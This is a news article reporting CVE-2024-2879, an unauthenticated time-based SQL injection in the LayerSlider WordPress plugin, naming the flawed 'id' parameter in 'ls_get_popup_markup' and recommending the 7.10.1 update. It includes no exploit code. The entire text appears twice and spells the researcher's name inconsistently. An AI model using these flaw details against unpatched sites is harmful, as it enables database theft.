As a simple WordPress plugin, it can undermine the web security of your product.
A common WordPress plugin called LayerSlider, which is used on more than a million websites to create responsive sliders, image galleries, and animations, was recently found to have a critical vulnerability that allows SQL injection without authentication.
The vulnerability, designated CVE-2024-2879, was identified by researcher Amr Awad on March 25, 2024. It was promptly reported to Wordfence, a WordPress security company, as part of a vulnerability search program. Awadh was awarded a $5,500 reward for responsible disclosure.
The issue concerns plugin versions 7.9.11 to 7.10.0 and can lead to the extraction of confidential data, including password hashes, from the site's database, creating the risk of a complete seizure of control or data leakage.
The Wordfence report indicates that the security flaw is related to incorrect processing of the "id" parameter in the "ls_get_popup_markup" function, which allows attackers to inject malicious SQL code. This leads to the execution of commands and the ability to extract information without the need for authentication on the site.
However, the possibility of an attack is limited by the fact that attackers must analyze the response time to extract data, which complicates the process a little.
The Kreatura development team responsible for creating the plugin was immediately notified of the issue and promptly released a security update on March 27, 2024, just a few days after the vulnerability was discovered.
All LayerSlider users are strongly recommended to update the plugin to version 7.10.1 to fix the vulnerability. In general, it is important for WordPress site administrators to regularly update all used plugins, disable unnecessary ones, use strong passwords, and deactivate inactive accounts to increase the level of protection.
A common WordPress plugin called LayerSlider, which is used on more than a million websites to create responsive sliders, image galleries, and animations, was recently found to have a critical vulnerability that allows SQL injection without authentication.
The vulnerability, designated CVE-2024-2879, was identified by researcher Amr Awad on March 25, 2024. It was promptly reported to Wordfence, a WordPress security company, as part of a vulnerability search program. Awadh was awarded a $5,500 reward for responsible disclosure.
The issue concerns plugin versions 7.9.11 to 7.10.0 and can lead to the extraction of confidential data, including password hashes, from the site's database, creating the risk of a complete seizure of control or data leakage.
The Wordfence report indicates that the security flaw is related to incorrect processing of the "id" parameter in the "ls_get_popup_markup" function, which allows attackers to inject malicious SQL code. This leads to the execution of commands and the ability to extract information without the need for authentication on the site.
However, the possibility of an attack is limited by the fact that attackers must analyze the response time to extract data, which complicates the process a little.
The Kreatura development team responsible for creating the plugin was immediately notified of the issue and promptly released a security update on March 27, 2024, just a few days after the vulnerability was discovered.
All LayerSlider users are strongly recommended to update the plugin to version 7.10.1 to fix the vulnerability. In general, it is important for WordPress site administrators to regularly update all used plugins, disable unnecessary ones, use strong passwords, and deactivate inactive accounts to increase the level of protection.
